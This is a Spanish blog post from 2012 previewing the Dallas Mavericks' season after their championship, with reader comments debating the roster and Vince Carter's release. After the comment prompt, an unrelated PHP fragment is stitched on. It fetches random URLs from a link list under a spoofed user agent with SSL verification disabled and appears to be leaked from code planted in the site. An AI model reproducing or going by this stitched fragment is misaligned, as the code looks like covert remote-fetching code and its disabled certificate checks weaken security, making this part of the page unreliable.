Dallas Mavericks: ¿Y ahora qué?

03 de January de 2012 por HisRoyalAirness

Por fin llegó. El pasado junio vimos a Dirk Nowitzki levantar el ansiado trofeo ‘Larry O’Brien’. Mucho tiempo esperando, muchas desilusiones e infortunios hasta llegar a ese momento. Junto a él ilustres de la liga como Jason Kidd o Shawn Marion que parecía que, como tantos otros, se retirarían sin el codiciado anillo de campeón.

Unos playoffs atípicos, apasionantes y duraderos que nos regalaron actuaciones legendarias y remontadas para la historia. Los últimos cuartos de los partidos de Dirk han sido para visionar en todas las escuelas de baloncesto del mundo. El alemán actuó como el mejor clutch player de los últimos años. No olvidaremos la remontada frente a los Thunder o la ya mítica, remontada del segundo partido de las Finales frente a los Heat.

Por si no lo era aún, Dirk Nowitzki ya es leyenda. Muy merecidamente. Y puede que ya estemos en condiciones de decir que ese “one-leged fadeaway jumper”, como le llaman al otro lado del Atlántico, sea uno de los mejores y más indefendibles tiros de la historia junto al Sky-Hook de Kareem, el fadeaway de Michael o el tiro a tabla de Duncan. Cabe destacar las decisiones tomadas por Rick Carlisle, sobre todo durante las Finales, que nos callaron a más de uno la boca (entre los cuales me incluyo) ganándole la partida a Eric Spoelstra en todo momento. Los que siempre le acusamos de inmovilista y cuadriculado vimos boquiabiertos como siempre tomó la mejor decisión para su equipo, se adaptó a toda circunstancia, varió incluso el quinteto inicial y eliminó a jugadores de la rotación, muy acertadamente, dependiendo de cada eventualidad. De 10. Su continuidad está más que asegurada. El estandarte de campeones ya se ha izado en lo alto del American Airlines Center. ¿Podrán los campeones defender su corona? Ahora lo veremos.

La nueva temporada comienza con cierta incertidumbre. El factor X que convirtió al equipo en un bloque defensivamente compacto, Tyson Chandler, emigra a NY City con el contrato de su vida. Su sustituto será Brendan Haywood o Ian Mahinmi, lo cual presenta dudas más que evidentes. La marcha del pívot deja al equipo en la misma situación que los años anteriores: no hay un 5 de verdaderas garantías, alguien capaz de imponer su ley bajo los tableros. A su baja se une la de DeShawn Stevenson, nuevo jugador de New Jersey Nets, que hará que el perímetro pierda a un hombre con un rol defensivo muy importante frente a anotadores rivales. Es decir, los Dallas Mavericks han perdido potencial defensivo con respecto al año pasado.El backcourt varía también por la marcha de JJ Barea. Hombre de perfil eminentemente anotador, el “pequeño” puertorriqueño tuvo un papel más que destacable en la postemporada y las finales, tanto que llegado el momento fue incluso titular. Tras manifestar cierto grado de decepción por el trato recibido por la franquicia ha hecho las maletas hacia la fría Minnesota. El anillo y su actuación en los decisivos quinto y sexto encuentro ya no se los quita nadie.

Para compensar Mark Cuban se ha hecho con los servicios del veterano Delonte West, uno de los trotamundos de la liga que puede cumplir un buen papel en la rotación dando descanso a los titulares y poniendo esa pizquita tan necesaria de agresividad. Además es un aceptable tirador de larga distancia.

El otro nombre ilustre de la plantilla es Jason Kidd. Tras demostrar, a sus 38 primaveras, una solvencia envidiable resta saber cómo seguirán tratando los años a “Mr. Triple-Doble”. De momento tiene el puesto asegurado y más que merecido, mientras su cuerpo no diga basta. Su defensa en momentos puntuales a Lebron James le hizo parecer un coloso y un veinteañero a los ojos de muchos (sobre todo a los del 6 de los Miami Heat). Segundo máximo asistente de todos los tiempos, tercero en triples-dobles y el guard más veterano en ser titular en unas finales. Currículum de un seguro hall of fammer ¿Se dará ya por satisfecho?

Jason Terry parece que seguirá siendo uno de los mejores sextos hombres del campeonato y un verdadero revulsivo gracias a su capacidad de anotación. Esto quedó más que demostrado en la segunda ronda frente a Lakers en la que batió el record de triples anotados en un partido de postemporada (9 de 10). Casi nada.

Para reforzar el perímetro llega a Texas una incorporación de gran renombre que ha pasado casi desapercibida por el abrumador bajón de nivel de sus últimas temporadas: Vince Carter. El que fuera apodado Vinsanity y Air Canada llega en el ocaso de su carrera y habiendo dejado atrás su época de All-Star. Su declive físico se ha hecho patente a la vez que sus registros han descendido notablemente. En sus últimos equipos parecía condicionar demasiado el juego sin dar unos grandes frutos por lo que los Suns han aplicado en él la nueva cláusula de amnistía acabaron despidiéndolo. Pese a todo, tiene calidad a raudales y es un refuerzo más que aprovechable y a un módico precio. Apunta a titular aunque ha de aceptar un rol poco protagonista por el bien del equipo. El trabajo del staff técnico se antoja fundamental en su adaptación.

Pese a no participar en la exitosa fase final y media temporada debido a una lesión, los Mavericks pierden al que fuera su segundo máximo anotador hasta tener que pasar por la enfermería, el alero Caron Butler. En su puesto quedan el cumplidor Shawn Marion y un regalito de navideño de la familia Buss que puede emplearse de 3 o de 4 (incluso, si me apuráis, de 5), con gran facilidad: el bicampeón Lamar Odom. ¿Su precio? Una segunda ronda y una trade exception de 8 millones. Como caído del cielo. Queda por ver en que posición tendrá minutos y como se compenetrará con el resto de forwards, sobre todo con Dirk. Una gran adquisición.

También es un año de despedidas. Tras 14 temporadas en la NBA la espalda de Peja Stojakovic ha dicho basta. El único europeo capaz de ser segundo máximo anotador de la liga se retira tras una exitosa carrera: 3 presencias en el All-Star, miembro de los mejores Kings de la historia, 2 veces ganador del concurso de triples, dos veces en el segundo quinteto y, por fin, campeón de la NBA en 2011. La rotación la completaran, con mayor o menor participación, Rodrigue Beaubois, Brendan Wright, Sean Williams, Dominique Jones y el mítico Brian Cardinal. Muchos de ellos no pasarán de tener una participación testimonial.

Por último, comenzando su treceava decimotercera temporada, está el líder, capitán y cara de la franquicia: el aleman y gran estrella Dirk Nowitzki. Ya no es un atrevimiento decir que estamos ante uno de los mejores power forwards de todos los tiempo. 2’15 de altura, capacidad reboteadora, gran inteligencia, tirador infalible, movimientos en el poste demoledores… Uno de los grandes. El nivel mostrado en los pasados Playoffs lo convierten en el virtual MVP de la postemporada y en el MVP real de las Finales. La indiscutible punta de lanza en los momentos decisivos, canastas de todos los colores y tiros ganadores de los que de verdad importan. Su subida de prestaciones en los playoffs dejó a más de uno sin armas para pararle o, siquiera, ralentizarle.Un dominador nato. A sus 33 años es uno de los jugadores más fiables de la NBA y parece que su físico tiene cuerda para unos años. Eso esperamos todos.

El dúo Mark Cuban-Dirk Nowitzki es sinónimo de más de 50 victorias. Nos tienen acostumbrados a excelentes resultados en Regular Season y a ciertas decepciones en Playoffs. Aún así siempre han sido unos fijos en los puestos de postemporada. La madurez reflejada el año pasado tanto por parte de los jugadores como de los técnicos puede conllevar una continuidad o ser el reflejo del nivel máximo que este equipo podría alcanzar. A partir de aquí todo serán suposiciones. Casi ninguno los vimos el año pasado como posibles campeones, ni siquiera como aspirantes a disputar la final. Nos demostraron lo equivocados que estábamos. Es evidente que con la marcha de Chandler pierden una de las claves del éxito del pasado año y que muchos de los integrantes van sumando años y en algún momento se notarán pero, como bien dijo Tomjanovich: “Don’t ever underestimate the heart of a champion”.

Hasta que alguien diga lo contrario ellos son el rival a batir.

Quinteto titular: Jason Kidd, Vince Carter, Shawn Marion, Dirk Nowitzki, Brendan Haywood
Sexto hombre: Jason Terry/Lamar Odom

Altas: Lamar Odom, Vince Carter, Delonte West.
Bajas: JJ Barea, Tyson Chandler, Caron Butler, DeShawn Stevenson, Peja Stojakovic.

Previsión: Primeros puestos del Oeste, en el top 4. Mínimo segunda ronda.

Comenta

15 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Carter no fue amnistiado no? llegaron con él a un acuerdo para liberarlo, eso creo vamos.

    Este año han empezado flojos, pero es normal habiendo cambiado medio equipo, supongo que al final de temporada estaran arriba.

      Citar

  2. HisRoyalAirness dice:
    #2

    No fue amnistiado? Tenia entendido que sí. Si no es asI mil disculpas, estaba practicamente seguro

      Citar

  3. HeiNeKeN dice:
    #3

    Lo cortaron y así solo le pagaron 4 millones que eran los que tenía garantizados, así que los Suns no han usado todavía la clausula.

      Citar

  4. rumbero dice:
    #4

    Creo que fue despedido. Un apaño como el de los Pistons con Hamilton.

    Me ha gustado el artículo. Recordaremos durante mucho tiempo esas finales. Son el rival a batir, pero dudo que puedan repetir lo de la temporada pasada. A Chandler lo van a echar muchísmo de menos, al igual que a Barea y en menor medida a Stevenson.
    De Vinsanity esperaría lo justo, y a Odom hay que darle tiempo, pero seguro que acaba siendo un excelente fichaje/regalo. Aun asi con Dirk en el equipo puede pasar cualquier cosa…pero Oklahoma y Miami les van a tener ganas.

      Citar

  5. Jose Luis dice:
    #5

    No fue amnistiado, fue un buy-out de su contrato. En el análisis de los Phoenix Suns también lo tenéis así, y también dijo alguien de corregirlo 🙂

      Citar

  6. HisRoyalAirness dice:
    #6

    Jose Luis:
    No fue amnistiado, fue un buy-out de su contrato. En el análisis de los Phoenix Suns también lo tenéis así, y también dijo alguien de corregirlo

    No sé quién hizo el de los Suns pero recuerdo que hubo varios sitios en internet sobre NBA en los que se dijo que habia sido amnistiado. Yo es que estaba convencido pero vamos, que si se corrige mejor. Gracias por el apunte!

      Citar

  7. Nacho dice:
    #7

    Interesante análisis. Solo un pero de redacción. Dirk comienza su décimotercera temporada.Treceava es una parte quesmada con otras doce partes hacen un todo. Eso sí, no se si décimotercera es junto o separado.

      Citar

  8. Nacho dice:
    #8

    Eso de “quesmada”, quiere decir “que sumada”

      Citar

  9. HisRoyalAirness dice:
    #9

    Nacho:
    Interesante análisis. Solo un pero de redacción. Dirk comienza su décimotercera temporada.Treceava es una parte quesmada con otras doce partes hacen un todo. Eso sí, no se si décimotercera es junto o separado.

    Cierto, me lo chivaron por otro sitio. fueron las prisas.
    No estoy muy entrenado pero se hace lo que se puede y con mucho gusto

      Citar

  10. Esteban dice:
    #10

    si el año pasado chandler llegaba bajo radar luego de un año decepcionante en los bobcats y termino siendo fundamental, quen anda bajo radar este año y me ha sorprendido gratamente es Ian Mahinmi, no solo esta triplicando sus estadisticas de la pasada temporada, sino que ya esta jugando los mismo minutos que haywood, no me sorprenderia que fuese titular en un par de partidos, y este puede ser el click de este equipo,
    el frances es pura polenta y quien te dice que pueda cumplir el rol de tyson, y haywood volver a la banca

      Citar

  11. RSB dice:
    #11

    La verdad es que si no fuera por el regalo inesperado y caído del cielo que fue Odom, estaba claro que Cuban no ha apostado por optar a nada este año (más allá de una RS y unos playoff decentitos), sino por empezar a abrir espacio salarial… ¿Para quién? ¿Williams? ¿Véis a Deron en Dallas de aquí a un año? En NY no se quedará a no ser que traigan a Howard, y aún estando los dos tendrían un equipo que sería un auténtico solar… Los Mavericks andan en stand by, a ver hasta dónde llegan

      Citar

  12. melo15 dice:
    #12

    Bueno, no creo que los Mavs,hagan nada especial este año, aunque el año pasado se decia lo mismo, Kidd,ya no es el de antes, Vince Carter esta acabadisimo,sin pivot,Odom es bastante irregular, tendrian que pasar la 1 ronda sin problemas, pero nunca se sabe

      Citar

  13. Sancho88 dice:
    #13

    los equipos campeones tienen una tendencia a convertirse en geriátricos… que da gusto.

      Citar

  14. esteban dice:
    #14

    Yo tampoco entiendo bien para q tanto espacio para el proximo verano, deron y howard y quien mas es agente libre? En todos lados leo q es una gran camada, pero la mayoria son reestringidos, me suena gerald wallace, y los viejos como kg, allen, odom, kidd, sacando a dwill y superman no me parece q sea una camda q cambie franquicias como la de lebron y wade
    Alguno q me recuerde nombres q me faltan

      Citar

  15. Sancho88 dice:
    #15

    Pienso que lo del año pasado no debe tomarse como una norma. Es decir, que un equipo que nadie daba un duro por ellos ganase la nba. Suele suceder una vez por década, no más. Detroit en 2004, Dallas en 2010… el basket se lo debía a Nowitzki. Pero este año no les veo más que luchando por segunda ronda. Se meterán porque está claro que esto es solo una mala racha, y como bien dices Airness, están en proceso de cohesión. La pretemporada ha sido muy corta, y para que Odom, Carter y West asimilen los sitemas de Carlisle hará falta un mes. Por tanto, para analizarlos bien, esperemos a mediados de enero. Aunque no pinta demasiado bien la cosa… creo que con Butler y Chandler tenían mucho más potencial, además Barea y Stojakovic aportaban los puntos desde el banquillo y este año no parece muy claro quién puede asumir ese rol además de Terry.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>